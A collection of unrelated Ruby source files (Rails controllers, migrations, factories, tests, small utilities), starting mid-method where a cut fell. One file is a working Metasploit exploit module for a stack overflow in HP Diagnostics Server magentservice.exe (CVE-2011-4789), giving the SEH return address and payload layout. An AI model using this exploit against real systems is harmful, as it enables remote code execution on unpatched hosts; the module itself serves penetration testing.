# Hour
search_built_time << search_time[3] + ':'
# Minute
if search_time[4].to_i < 10
search_built_time << '0' + search_time[4]
else
search_built_time << search_time[4]
end
# Second
search_built_time << ':00 -0500'
search_built_time
end
def get_option_value(options)
return 0 if options.blank?
options = options.split(//)
result = 0
options.each do |opt|
result |= REGEX_OPTIONS[opt]
end
result
end
def get_s3_files
begin
yield
rescue
@jsons << {
'line_number' => 0,
'output_time' => Time.zone.now.strftime("%Y-%m-%d %H:%M:%S.%L"),
'message' => 'AWS S3 Access Denied. Please check your permissions.'
}
return []
end
end
end
end
end
|
class ReportsController < ApplicationController
def index
redirect_to action: 'transactions'
end
def transactions
relation = Transaction.where(category_id: current_user.categories.map(&:id))
relation = relation.where('date >= ?', params[:from_date]) if params[:from_date].present?
relation = relation.where('date <= ?', params[:to_date]) if params[:to_date].present?
relation = relation.where('category_id = ?', params[:category_id]) if params[:category_id].present?
@transactions = relation.all
end
end
|
require 'date'
module AndroidDeployment
class LogFile
def initialize(file_name)
@file = File.new("log/#{file_name}.log", 'a+')
end
def puts(message)
@file.puts "[#{DateTime.now}]" + message
@file.flush
end
def close
@file.close
end
end
end
|
class AddDetailsToUsers < ActiveRecord::Migration
def change
add_column :users, :member_id, :string, null: false, default: "", :limit => 16
add_column :users, :first_name, :string, null: false, default: ""
add_column :users, :family_name, :string, null: false, default: ""
add_column :users, :gender, :string, null: false, default: "", :limit => 8
add_column :users, :location, :string, null: false, default: ""
add_column :users, :street, :string, null: false, default: ""
add_column :users, :zipcode, :string, null: false, default: "", :limit => 8
add_column :users, :country, :string, null: false, default: "", :limit => 3
add_column :users, :phone, :string, null: false, default: "", :limit => 16
add_column :users, :iban, :string, null: false, default: "", :limit => 34
add_column :users, :bic, :string, null: false, default: "", :limit => 11
add_column :users, :bank, :string, null: false, default: "", :limit => 32
add_column :users, :mandate_reference, :string, null: false, default: "", :limit => 32
add_column :users, :status, :string, null: false, default: "active", :limit => 8
add_column :users, :comment, :string, null: false, default: ""
add_column :users, :fee, :decimal, null: false, default: 0.0
end
end
|
module SkuConfigs
def nitrogen
{ name: :nitrogen, image_link: "nitrogen.png", window: @window,
x: 220, y: 280, quantity: 3, height: 66, width: 60,
description: "Gives you bonus boost for certain berries.", type: :fertilizer }
end
def potassium
{ name: :potassium, image_link: "potassium.png", window: @window,
x: 260, y: 280, quantity: 3, height: 76, width: 60,
description: "Gives you pot boost for certain berries.", type: :fertilizer }
end
def phosphorus
{ name: :phosphorus, image_link: "phosphorus.png", window: @window,
x: 340, y: 280, quantity: 3, height: 76, width: 60,
description: "Gives you pho boost for certain berries.", type: :fertilizer }
end
def hoe
{ name: :hoe, image_link: "hoe.png", window: @window,
x: 375, y: 380, quantity: 1, height: 65, width: 100,
description: "Hoe that permanently increases berry production by 1", type: :hoe }
end
def helpers
{ name: :helpers, image_link: "helper.png", window: @window,
x: 410, y: 200, quantity: 3, height: 177, width: 150,
description: "Helpers allow you to take more turns per month", type: :helper }
end
def tractor
{ name: :tractor, image_link: "tractor.png", window: @window,
x: 540, y: 270, quantity: 1, height: 237, width: 350, z: 0,
description: "The tractor lets you get more work done in less time", type: :tractor }
end
end
|
class ProjectsController < ApplicationController
before_action :redirect_if_not_signed_in
before_action :set_user
before_action :set_project, except: [:index, :new, :create]
def index
@projects = Project.search(params[:query])
end
def new
@project = Project.new
end
def create
@project = @user.projects.build(project_params)
if @project.save
redirect_to projects_path
else
flash[:notify] = @project.errors.full_messages
render :new
end
end
def show
end
def edit
redirect_to projects_path unless current_user == @project.user
end
def update
if @project.update(project_params)
redirect_to project_path(@project)
else
flash[:notify] = @project.errors.full_messages
render :edit
end
end
def destroy
if current_user == @project.user
@project.destroy
else
flash[:alert] = "You are not authorized to do that"
end
redirect_to projects_path
end
private
def set_user
@user = User.find_by_id(params[:user_id])
end
def set_project
@project = Project.find_by_id(params[:id])
end
def project_params
params.require(:project).permit(:title, :genre, :info, :contact, :user_id)
end
end
|
class Role < ActiveRecord::Base
ROLES = {
:admin => 'Admin',
:editor => 'Editor',
:registered => 'Registered'
}
has_and_belongs_to_many :users
validates_uniqueness_of :name
validates_presence_of :name
def self.[](value)
raise ArgumentError, "Role not available: '#{value}'" unless ROLES[value]
Role.find_or_create_by_name(ROLES[value])
end
end
|
FactoryGirl.define do
factory :stage do
sequence(:url) { |n| "test#{n}-example.com" }
end
end
|
class Digg
def initialize
@resource = (Service.new("http://digg.com/api/news/popular.json")).resource
end
def get_news
news = []
@resource['data']['feed'].each do |item|
news << FilterNews.new(item)
end
news
end
private
class FilterNews
attr_reader :title, :author, :date, :url, :source
def initialize (news_hash)
@title = news_hash['content']['title']
@author = news_hash['content']['author']
@date = (news_hash['date'] + 16200)
@url = news_hash['content']['url']
@source = "Digg"
end
end
end
|
class MarkerMailer < ActionMailer::Base
def done_email(marker, user)
@marker = marker
@user = user
rel = DocumentUserRelation.find_by_document_id_and_user_id(marker.document.id, user.id)
@url = code_url(rel.code)
headers 'In-Reply-To' => marker.message_id('create', @user)
mail to: @user.email, subject: '@glance marker notification'
end
def marker_creation_email(marker, user)
@marker = marker
@user = user
rel = DocumentUserRelation.find_by_document_id_and_user_id(marker.document.id, user.id)
@url = code_url(rel.code)
headers 'Message-ID' => marker.message_id('create', @user),
'In-Reply-To' => rel.message_id('share')
mail to: @user.email, subject: 'Congratulations, you have new pins @Glance'
end
end
|
# frozen_string_literal: true
require 'test_helper'
module Vedeu
describe 'Bindings' do
it { Vedeu.bound?(:_log_).must_equal(true) }
end
module Logging
describe Log do
let(:described) { Vedeu::Logging::Log }
let(:_message) { 'Some message...' }
let(:type) { :info }
describe '.count' do
it { described.must_respond_to(:count) }
end
describe '.count=' do
it { described.must_respond_to(:count=) }
end
describe '.indent' do
context 'when the block is given' do
subject { described.indent { :block_given } }
it { subject.must_equal(:block_given) }
end
context 'when the block is not given' do
subject { described.indent }
it { subject.must_equal(nil) }
end
context 'when the indentation count > 0' do
before { described.count = 2 }
after { described.count = nil }
subject { described.indent { :block_given } }
it { subject; described.count.must_equal(2) }
end
context 'when the indentation count is 0' do
before { described.count = 0 }
after { described.count = nil }
subject { described.indent { :block_given } }
it { subject; described.count.must_equal(0) }
end
context 'when the indentation count < 0' do
before { described.count = -2 }
after { described.count = nil }
subject { described.indent { :block_given } }
it { subject; described.count.must_equal(0) }
end
end
describe '.log' do
before { Vedeu.config.stubs(:log?).returns(enabled) }
subject { described.log(message: _message, type: type) }
context 'when the log is enabled' do
let(:enabled) { true }
let(:expected) {
"\e[97m[info] \e[39m\e[37mSome message...\e[39m"
}
it { subject.must_equal(expected) }
end
context 'when the log is disabled' do
let(:enabled) { false }
it { subject.must_equal(nil) }
end
end
describe '.log_stdout' do
let(:type) { :create }
let(:_message) { 'Logging to stdout...' }
subject { described.log_stdout(type: type, message: _message) }
it do
capture_io { subject }.must_equal(
["\e[96m[create] \e[39m\e[36mLogging to stdout...\e[39m\n", ""]
)
end
end
describe '.log_stderr' do
let(:type) { :debug }
let(:_message) { 'Logging to stderr...' }
subject { described.log_stderr(type: type, message: _message) }
it do
capture_io { subject }.must_equal(
["", "\e[97m[debug] \e[39m\e[37mLogging to stderr...\e[39m\n"]
)
end
end
describe '.log_timestamp' do
it { described.must_respond_to(:log_timestamp) }
end
describe '.outdent' do
context 'when the block is given' do
subject { described.outdent { :block_given } }
it { subject.must_equal(:block_given) }
end
context 'when the block is not given' do
subject { described.outdent }
it { subject.must_equal(nil) }
end
context 'when the indentation count > 0' do
before { described.count = 2 }
after { described.count = nil }
subject { described.outdent { :block_given } }
it { subject; described.count.must_equal(1) }
end
context 'when the indentation count is 0' do
before { described.count = 0 }
after { described.count = nil }
subject { described.outdent { :block_given } }
it { subject; described.count.must_equal(0) }
end
context 'when the indentation count < 0' do
before { described.count = -2 }
after { described.count = nil }
subject { described.outdent { :block_given } }
it { subject; described.count.must_equal(0) }
end
end
describe '.timestamp' do
subject { described.timestamp }
# @todo Add more tests.
end
end # Log
end # Logging
end # Vedeu
|
FactoryBot.define do
factory :step do
operation { "MyString" }
expected_minutes { 30.0 }
comment { "MyString" }
trait :invalid do
operation { nil }
end
trait :new_operation do
operation { "NewOperation" }
end
end
end
|
class AddOrdersColumns < ActiveRecord::Migration[6.0]
def change
add_reference :orders, :video, foreign_key: true
add_reference :orders, :user, foreign_key: true
add_reference :orders, :purchase, foreign_key: true
add_column :orders, :confirmed, :boolean, default: false
end
end
|
module GoogleApps
# Represents a domain user.
class User < Entry
get_all { "#{ENDPOINT}/#{GoogleApps.connection.domain}/user/2.0" }
get_one { |id| "#{ENDPOINT}/#{GoogleApps.connection.domain}/user/2.0/#{id}" }
post_new { "#{ENDPOINT}/#{GoogleApps.connection.domain}/user/2.0" }
put_updated { |u| "#{ENDPOINT}/#{GoogleApps.connection.domain}/user/2.0/#{u.user_name}" }
attributes 'apps:login', :user_name, :admin, :suspended, :agreed_to_terms,
:password, :hash_function_name, :change_password_at_next_login, :ip_whitelisted
attributes 'apps:name', :given_name, :family_name
attributes 'apps:quota', :limit
identity :user_name
# Set password by sending hashed value.
def new_password=(value)
@password = Digest::SHA1.hexdigest(value)
@hash_function_name = 'SHA-1'
end
end
# Represents an email nickname.
class Nickname < Entry
get_all { "#{ENDPOINT}/#{GoogleApps.connection.domain}/nickname/2.0" }
post_new { "#{ENDPOINT}/#{GoogleApps.connection.domain}/nickname/2.0" }
delete_one { |n| "#{ENDPOINT}/#{GoogleApps.connection.domain}/nickname/2.0/#{n.name}" }
attributes 'apps:nickname', :name
attributes 'apps:login', :user_name
end
end
|
class CashRegister
attr_accessor :total, :discount, :price, :items
def initialize(discount = 0)
@total = 0
@discount = discount
@items = []
end
def add_item(item, price, amount = 1)
@price = price
@total += price * amount
@item_num = amount
i = 0
for i in 1..amount do
@items << item
i += 1
end
end
def apply_discount
if @discount != 0
@savings = (price * discount)/100
@total -= @savings
return "After the discount, the total comes to $#{total}."
else
return "There is no discount to apply."
end
end
def void_last_transaction
@total -= @price * @item_num
end
end
|
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Diagnostics Server magentservice.exe overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP Diagnostics Server
magentservice.exe service. By sending a specially crafted packet, an attacker
may be able to execute arbitrary code. Originally found and posted by
AbdulAziz Harir via ZDI.
},
'Author' =>
[
'AbdulAziz Hariri', # Original discovery
'hal', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '72815'],
['CVE', '2011-4789'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'SSL' => true,
'SSLVersion' => 'SSL3'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Diagnostics Server 9.10',
{
# pop esi # pop ebx # ret 10
# magentservice.exe
'Ret' => 0x780c8f1f
}
]
],
'DisclosureDate' => 'Jan 12 2012'))
register_options([Opt::RPORT(23472)], self.class)
end
def exploit
req = "\x00\x00\x00\x00"
req << rand_text_alpha_upper(1092)
req << generate_seh_payload(target.ret)
connect
sock.put(req)
handler
disconnect
end
end |
require "test_helper"
class UsersControllerTest < ActionDispatch::IntegrationTest
fixtures :users
setup do
@user = users(:one)
end
def test_should_get_new
get new_user_url
assert_response :success
end
def test_should_create_user_and_associated_loan_application
assert_difference ["User.count", "LoanApplication.count"] do
post users_url,
params: {
user: {
email: @user.email,
loan_application_attributes: {
requested_amount: 400_000,
property_state: "CA",
credit_score: 800,
first_time_home_buyer: false,
}
}
}
end
assert_redirected_to edit_user_url(User.last)
end
def test_should_get_edit
get edit_user_url @user
assert_response :success
end
def test_should_update_user_with_selected_loan
patch user_url(@user),
params: {
user: {
email: @user.email,
loan_attributes: {
id: @user.loan.id,
name: "Some Good Loan",
rate: 1.0,
term: 360,
}
}
}
assert_redirected_to loan_url(@user.loan)
end
end
|
class User < ActiveRecord::Base
include SessionsHelper
has_secure_password
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-.]+\.[a-z]+\z/i
validates :email,
presence: true,
format: { with: VALID_EMAIL_REGEX },
uniqueness: { case_sensitive: false }
validates :password,
length: { minimum: 6 }
before_save do
self.email.downcase!
end
before_create do
self.remember_token = encrypt_token new_token
self.confirmation_token = new_token unless self.skip_confirmation
end
after_create do
UserMailer.confirmation_email(self).deliver_later
end
attr_accessor :skip_confirmation
def confirmed?
confirmation_token.nil?
end
def confirm!
update_attribute :confirmation_token, nil
end
def skip_confirmation!
@skip_confirmation = true
end
end
|
class PinGroupsController < ApplicationController
before_filter :login_required
filter_access_to :all
# GET /pin_groups
# GET /pin_groups.xml
def index
@pin_groups = PinGroup.paginate :per_page=>20,:page => params[:page], :order => 'id DESC'
respond_to do |format|
format.html # index.html.erb
format.xml { render :xml => @pin_groups }
end
end
# GET /pin_groups/1
# GET /pin_groups/1.xml
def show
@pin_group = PinGroup.find(params[:id])
unless params[:search].nil?
params[:search].merge(:pin_group_id_equals => @pin_group.id)
else
params[:search] = {:pin_group_id_equals => @pin_group.id}
end
@results = PinNumber.search(params[:search])
@pin_numbers = @results.paginate :per_page=>30,:page => params[:page], :order => 'id DESC'
end
def search_ajax
@pin_group = PinGroup.find(params[:pin_group_id])
@i = ((params[:page].to_i - 1) * 30) if params[:page].present?
unless params[:search]
search = {:pin_group_id_equals => params[:pin_group_id]}
if params[:query].length >= 14
search = search.merge(:number_equals => params[:query].strip)
else
search = search.merge(:number_begins_with => params[:query].strip)
end
if params[:option] == "active"
search = search.merge(:is_active_equals => true)
elsif params[:option] == "inactive"
search = search.merge(:is_active_equals => false)
elsif params[:option] == "registered"
search = search.merge(:is_registered_equals => true)
end
else
@repeat_search = true
@search = params[:search]
search = params[:search]
end
@results = PinNumber.search(search)
@pin_numbers = @results.paginate :per_page=>30,:page => params[:page], :order => 'id DESC'
render :update do |page|
@query = params[:query]
@option = params[:option]
page.replace_html 'pin_list',:partial => 'list_pins'
end
end
# GET /pin_groups/new
# GET /pin_groups/new.xml
def new
@pin_group = PinGroup.new
@courses = RegistrationCourse.active
respond_to do |format|
format.html # new.html.erb
format.xml { render :xml => @pin_group }
end
end
# GET /pin_groups/1/edit
def edit
@courses = RegistrationCourse.active
@pin_group = PinGroup.find(params[:id])
end
# POST /pin_groups
# POST /pin_groups.xml
def create
@pin_group = PinGroup.new(params[:pin_group])
respond_to do |format|
if @pin_group.save
flash[:notice] = t('flash1')
format.html { redirect_to(@pin_group) }
format.xml { render :xml => @pin_group, :status => :created, :location => @pin_group }
else
@courses = RegistrationCourse.active
format.html { render :action => "new" }
format.xml { render :xml => @pin_group.errors, :status => :unprocessable_entity }
end
end
end
# PUT /pin_groups/1
# PUT /pin_groups/1.xml
def update
@pin_group = PinGroup.find(params[:id])
@courses = RegistrationCourse.active
unless params[:pin_group][:course_ids].present?
@pin_group.errors.add("course_ids","can't be blank")
render :edit and return
end
respond_to do |format|
if @pin_group.update_attributes(params[:pin_group])
if params[:pin_group][:is_active]=="1"
@pin_group.pin_numbers.update_all("is_active=true")
else
@pin_group.pin_numbers.update_all("is_active=false")
end
flash[:notice] = t('flash2')
format.html { redirect_to(@pin_group) }
format.xml { head :ok }
else
format.html { render :action => "edit" }
format.xml { render :xml => @pin_group.errors, :status => :unprocessable_entity }
end
end
end
# DELETE /pin_groups/1
# DELETE /pin_groups/1.xml
def deactivate_pin_group
@pin_group = PinGroup.find(params[:id])
if @pin_group.is_active?
@pin_group.update_attributes(:is_active => false)
PinNumber.update_all("is_active= false","pin_group_id = #{@pin_group.id}")
else
@pin_group.update_attributes(:is_active => true)
PinNumber.update_all("is_active= true","pin_group_id = #{@pin_group.id}")
end
flash[:notice] = t('flash3')
redirect_to pin_groups_path
end
def deactivate_pin_number
@pin_number = PinNumber.find(params[:id])
@pin_group = @pin_number.pin_group
if @pin_number.is_active?
@pin_number.update_attributes(:is_active => false)
if @pin_group.pin_numbers.count(:conditions=>{:is_active=>true})== 0 and @pin_group.is_active
@pin_group.update_attributes(:is_active => false)
end
else
@pin_number.update_attributes(:is_active => true)
if @pin_group.pin_numbers.count(:conditions=>{:is_active=>true}) > 0 and @pin_group.is_active == false
@pin_group.update_attributes(:is_active => true)
end
end
flash[:notice] = t('flash4')
redirect_to @pin_group
end
end
|
# frozen_string_literal: true
require 'emis/models/combat_pay'
require 'emis/models/deployment'
require 'emis/models/veteran_status'
module EMIS
module Models
class DentalIndicator
include Virtus.model
attribute :separation_date, Date
attribute :dental_indicator, String
end
class EligibilityDeploymentLocation
include Virtus.model
attribute :segment_identifier, String
attribute :country_code, String
attribute :iso_a3_country_code, String
end
class EligibilityDeployment
include Virtus.model
attribute :segment_identifier, String
attribute :begin_date, Date
attribute :end_date, Date
attribute :project_code, String
attribute :locations, Array[EligibilityDeploymentLocation]
end
class EligibilityMilitaryServiceEpisode
include Virtus.model
attribute :begin_date, Date
attribute :end_date, Date
attribute :branch_of_service_code, String
attribute :discharge_character_of_service_code, String
attribute :honorable_discharge_for_va_purpose_code, String
attribute :narrative_reason_for_separation_code, String
attribute :deployments, Array[EligibilityDeployment]
attribute :combat_pay, Array[EMIS::Models::CombatPay]
end
class MilitaryServiceEligibilityInfo
include Virtus.model
attribute :veteran_status, Array[EMIS::Models::VeteranStatus]
attribute :dental_indicator, Array[DentalIndicator]
attribute :military_service_episodes, Array[EligibilityMilitaryServiceEpisode]
end
end
end
|
class RoleSerializer < ApplicationSerializer
object_as :role
attributes(
:name,
:resource_type,
:resource_id,
:created_at,
:updated_at,
)
has_many :activities, serializer: ActivitySerializer
has_many :people, serializer: PersonSerializer
has_many :person_groups, serializer: PersonGroupSerializer
end
|
#!/usr/bin/env ruby
# frozen_string_literal: true
require_relative 'board'
require_relative 'color'
# Knight
class Knight
include Color
def initialize
@moves = [[2, 1], [2, -1], [1, 2], [-1, 2], [-2, 1], [-2, -1], [1, -2], [-1, -2]]
@min_coordinate = 0
@max_coordinate = 7
@board = Board.new(self)
end
def possible_moves_from_coordinate(coordinate)
possible_moves = []
@moves.each do |move|
possible_x_coordinate = coordinate[0] + move[0]
possible_y_coordinate = coordinate[1] + move[1]
possible_coordinate = [possible_x_coordinate, possible_y_coordinate]
next unless valid_move?(possible_coordinate)
possible_moves << possible_coordinate
end
possible_moves
end
def knight_moves(start_coordinate, end_coordinate)
print_shortest_path(@board.find_shortest_path(start_coordinate, end_coordinate))
end
private
def valid_move?(coordinate)
coordinate.all? { |value| value.between?(@min_coordinate, @max_coordinate) }
end
def print_shortest_path(path)
puts path.map { |node| color_text("[#{node[0]}, #{node[1]}]", :magenta) }.join(color_text(' -> ', :red))
end
end
|
FactoryBot.define do
factory :unit do
name { Faker::Address.secondary_address }
association :building, factory: :building
end
end
|
require 'rabbit_jobs'
require 'rake'
def rails_env
defined?(Rails) ? Rails.env : (ENV['RAILS_ENV'] || 'development')
end
def app_root
Pathname.new(ENV['RAILS_ROOT'] || Rails.root)
end
def make_dirs
%w(log tmp tmp/pids).each do |subdir|
dir = app_root.join(subdir)
Dir.mkdir(dir) unless File.directory?(dir)
end
end
namespace :rj do
task :environment do
Rails.application.require_environment! if defined?(Rails)
end
desc 'Starts a Rabbit Jobs worker'
task worker: :environment do
queues = (ENV['QUEUES'] || ENV['QUEUE'] || '').split(',')
make_dirs
worker = RJ::Worker.new(*queues)
worker.consumer = RJ::Consumer.const_get(ENV['CONSUMER'].classify).new if ENV['CONSUMER']
worker.process_name = "rj_worker #{rails_env} [#{queues.join(',')}]"
exit(worker.work)
end
desc 'Starts a Rabbit Jobs scheduler'
task :scheduler do
make_dirs
scheduler = RabbitJobs::Scheduler.new
scheduler.process_name = "rj_scheduler #{rails_env}"
exit(scheduler.work)
end
end
|
class AddDoToComment < ActiveRecord::Migration
def self.up
add_column :comments, :do, :string, :default => "comment" # maybe follow
add_index :comments, [:do]
end
def self.down
remove_column :comments
end
end
|
require 'rails_helper'
RSpec.describe PurchaseAddress, type: :model do
before do
@purchase_address = FactoryBot.build(:purchase_address)
end
describe '商品購入情報登録' do
context '商品購入情報登録がうまくいくとき' do
it 'クレジットカードの情報と配送先住所の情報が正しく入力されていれば保存ができること' do
expect(@purchase_address).to be_valid
end
it '配送先住所の建物名は空でも保存できること' do
@purchase_address.building = nil
expect(@purchase_address).to be_valid
end
it '電話番号が11文字以内であれば保存できること' do
@purchase_address.tel = '0458889999'
expect(@purchase_address).to be_valid
end
end
context '商品購入情報登録がうまくいかないとき' do
it 'クレジットカードの情報が空では保存できないこと' do
@purchase_address.token = nil
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include("クレジットカード情報を入力してください")
end
it '郵便番号が空では保存できないこと' do
@purchase_address.postal_code = nil
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include("郵便番号を入力してください")
end
it '郵便番号が半角のハイフンを含んだ正しい形式でないと保存できないこと' do
@purchase_address.postal_code = 1_112_222
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include('郵便番号はハイフンが必要です')
end
it '配送先住所の都道府県が選択されていないと保存できないこと' do
@purchase_address.state_id = nil
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include('都道府県を入力してください')
end
it '配送先住所の都道府県選択でid:1を選択していると保存できないこと' do
@purchase_address.state_id = 1
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include('都道府県は1以外の値にしてください')
end
it '配送先住所の市区町村が空では保存できないこと' do
@purchase_address.city = nil
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include("市区町村を入力してください")
end
it '配送先住所の番地が空では保存できないこと' do
@purchase_address.house_number = nil
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include("番地を入力してください")
end
it '電話番号が空では保存できないこと' do
@purchase_address.tel = nil
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include("電話番号を入力してください")
end
it '電話番号が11文字以上では保存できないこと' do
@purchase_address.tel = '090123456789'
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include('電話番号は11文字以内の数字のみ入力できます')
end
it '電話番号にハイフン等の記号が含まれていると保存できないこと' do
@purchase_address.tel = '090-1234-5678'
@purchase_address.valid?
expect(@purchase_address.errors.full_messages).to include('電話番号は11文字以内の数字のみ入力できます')
end
end
end
end
|
class Admin < ActiveRecord::Base
validates_inclusion_of :singleton_guard, in: [0]
def self.instance
# there will be only one row, and its ID must be '1'
if Admin.all.count == 1
return Admin.all.first
else
Admin.destroy_all
admin = Admin.create(singleton_guard: 0)
return admin
end
end
end
|
class Xlsx
def self.file_names
res = []
path = Rails.root.join('tmp', 'xlsx')
Dir.open(path) do |dir|
dir.each do |f|
next if f.match(/^~/)
next unless f.match(/xlsx$/)
res.push(f)
end
end
res
end
def self.file filename, template
workbook = RubyXL::Parser.parse(Rails.root.join('tmp', 'xlsx', template))
worksheet = workbook[0]
# https://github.com/weshatheleopard/rubyXL
# Possible weights: hairline, thin, medium, thick
#
# http://www.rubydoc.info/gems/rubyXL/3.3.17/RubyXL
# %w{ none thin medium dashed dotted thick double hair
# mediumDashed dashDot mediumDashDot dashDotDot slantDashDot }
5.upto(10).each do |i|
worksheet.add_cell(i, 1, 'hoge')
#worksheet.sheet_data[i][1].change_border(:top, 'thin') # 普通の線
#worksheet.sheet_data[i][1].change_border(:top, 'hairline') # 線なし
#worksheet.sheet_data[i][1].change_border(:top, 'medium') # 太線
worksheet.sheet_data[i][1].change_border(:top, 'dotted') # 点線
end
FileUtils.mkdir_p(Rails.root.join('tmp', 'csv'))
path = Rails.root.join('tmp', 'csv', "#{filename}.xlsx")
workbook.write(path)
path
end
end
|
# frozen_string_literal: true
module Validators
class Checklists < Base
include ChecklistsValidatorHelper
def initialize(fields)
@fields = fields
end
def validate(list)
@list = list
fields.each { |field| send(field) }
end
private
attr_reader :fields, :list
def ticket
validate_ticket_presence
end
def title
validate_title_presence
end
end
end
|
class AddResultToUserSubmissions < ActiveRecord::Migration
def change
add_column :user_submissions, :result_file, :binary
end
end
|
class PrintDetail < ApplicationRecord
acts_as_paranoid
belongs_to :job_request
include AttachmentUploader::Attachment.new(:attachment)
def as_json(*)
previous = super
# previous[:cached_attachment_data] = cached_attachment_data
previous[:attachment] = attachment
previous[:attachment_url] = attachment_url
previous
end
def self.print_methods
['Silkscreen',
'Heat Transfer',
'Crackle',
'Crystalina (Glitter)',
'Foil',
'Flocking',
'Gel',
'Glow-In-The-Dark',
'High Density',
'High Gloss',
'Metallic',
'Pearlescent',
'Puff',
'Embroidery',
'Dye Sub',
'Full Embroidery',
'CMYK']
end
def self.block_sizes
['A3','A3+','A4','A5','Full','N/A','3 x 3']
end
def self.print_positions
['Front','Back','Side Left','Side Right']
end
end
|
class Department
attr_accessor :id, :name
def courses
courses = Course.find_all_by_department_id(@id)
end
def add_course(course)
course.department = self
end
def self.create_table
create = "CREATE TABLE IF NOT EXISTS departments (id INTEGER PRIMARY KEY, name TEXT);"
DB[:conn].execute(create)
end
def self.drop_table
drop = "DROP TABLE IF EXISTS departments;"
DB[:conn].execute(drop)
end
def insert
db = DB[:conn]
insert = db.prepare("INSERT INTO departments (name) VALUES (?);")
rows = insert.execute(@name)
@id = db.last_insert_row_id()
end
def update
db = DB[:conn]
update = db.prepare("UPDATE departments SET name = ? WHERE departments.id = ?;")
update.execute(@name, @id)
end
def save
if @id == nil
self.insert
else
self.update
end
end
def self.new_from_db(row)
dept = Department.new()
dept.id = row[0]
dept.name = row[1]
dept
end
def self.find_by_name(name)
db = DB[:conn]
find = db.prepare("SELECT * FROM departments WHERE departments.name = ?")
results = find.execute(name).to_a
if results != []
Department.new_from_db(results[0])
else
nil
end
end
def self.find_by_id(id)
db = DB[:conn]
find = db.prepare("SELECT * FROM departments WHERE departments.id = ?")
results = find.execute(id).to_a
if results != []
Department.new_from_db(results[0])
else
nil
end
end
end
|
#!/usr/bin/env ruby
begin
x = 1/0
rescue ZeroDivisionError
puts "you cannot divide by zero"
ensure
@flag = 1
puts "inside ensure"
end
|
class Recipe < ActiveRecord::Base
validates :name, presence: true
validates :ingredients, presence: true
validates :instructions, presence: true
end
|
unless Kernel.respond_to?(:require_relative)
module Kernel
def require_relative(path)
require File.join(File.dirname(caller.first), path.to_str)
end
end
end
lib_dir = File.expand_path(File.dirname(__FILE__))
$LOAD_PATH.unshift lib_dir unless $LOAD_PATH.include?(lib_dir)
os_config = File.join(lib_dir, "brightbox-cli", "os_config.rb")
require os_config if File.exist? os_config
vendor_dir = File.expand_path(File.join(lib_dir, 'brightbox-cli', 'vendor'))
# Add any vendored libraries into search path
Dir.glob(vendor_dir + '/*').each do |f|
$LOAD_PATH.unshift File.join(f, 'lib')
end
require "multi_json"
require 'date'
require 'gli'
require "i18n"
require "fog/brightbox"
# I18n stuff to clean up scattered text everywhere
I18n.enforce_available_locales = false
I18n.default_locale = :en
I18n.load_path = [File.join(File.dirname(__FILE__) + "/../locales/en.yml")]
module Brightbox
DEFAULT_API_ENDPOINT = ENV["BRIGHTBOX_API_URL"] || "https://api.gb1.brightbox.com"
EMBEDDED_APP_ID = "app-12345"
EMBEDDED_APP_SECRET = "mocbuipbiaa6k6c"
autoload :Server, File.expand_path("../brightbox-cli/servers", __FILE__)
autoload :DetailedServer, File.expand_path("../brightbox-cli/detailed_server", __FILE__)
autoload :Image, File.expand_path("../brightbox-cli/images", __FILE__)
autoload :Type, File.expand_path("../brightbox-cli/types", __FILE__)
autoload :Zone, File.expand_path("../brightbox-cli/zones", __FILE__)
autoload :CloudIP, File.expand_path("../brightbox-cli/cloud_ips", __FILE__)
autoload :User, File.expand_path("../brightbox-cli/users", __FILE__)
autoload :Account, File.expand_path("../brightbox-cli/accounts", __FILE__)
autoload :CollaboratingAccount, File.expand_path("../brightbox-cli/collaborating_account", __FILE__)
autoload :LoadBalancer, File.expand_path("../brightbox-cli/load_balancers", __FILE__)
autoload :ServerGroup, File.expand_path("../brightbox-cli/server_groups", __FILE__)
autoload :DetailedServerGroup, File.expand_path("../brightbox-cli/detailed_server_group", __FILE__)
autoload :FirewallPolicy, File.expand_path("../brightbox-cli/firewall_policy", __FILE__)
autoload :FirewallRule, File.expand_path("../brightbox-cli/firewall_rule", __FILE__)
autoload :FirewallRules, File.expand_path("../brightbox-cli/firewall_rules", __FILE__)
autoload :Collaboration, File.expand_path("../brightbox-cli/collaboration", __FILE__)
autoload :UserCollaboration, File.expand_path("../brightbox-cli/user_collaboration", __FILE__)
autoload :DatabaseType, File.expand_path("../brightbox-cli/database_type", __FILE__)
autoload :DatabaseServer, File.expand_path("../brightbox-cli/database_server", __FILE__)
autoload :DatabaseSnapshot, File.expand_path("../brightbox-cli/database_snapshot", __FILE__)
module Config
autoload :SectionNameDeduplicator, File.expand_path("../brightbox-cli/config/section_name_deduplicator", __FILE__)
end
end
require_relative "brightbox/cli/config"
require_relative "brightbox-cli/connection_manager"
require_relative 'brightbox-cli/tables'
require_relative "brightbox-cli/logging"
require_relative "brightbox-cli/api"
require_relative "brightbox-cli/config/cache"
require_relative "brightbox-cli/config/gpg_encrypted_passwords"
require_relative "brightbox-cli/config/authentication_tokens"
require_relative "brightbox-cli/config/accounts"
require_relative "brightbox-cli/config/clients"
require_relative "brightbox-cli/config/sections"
require_relative "brightbox-cli/config/api_client"
require_relative "brightbox-cli/config/user_application"
require_relative "brightbox-cli/config/to_fog"
require_relative "brightbox-cli/config/dirty"
require_relative "brightbox-cli/config"
require_relative "brightbox-cli/version"
require_relative "brightbox-cli/ruby_core_ext"
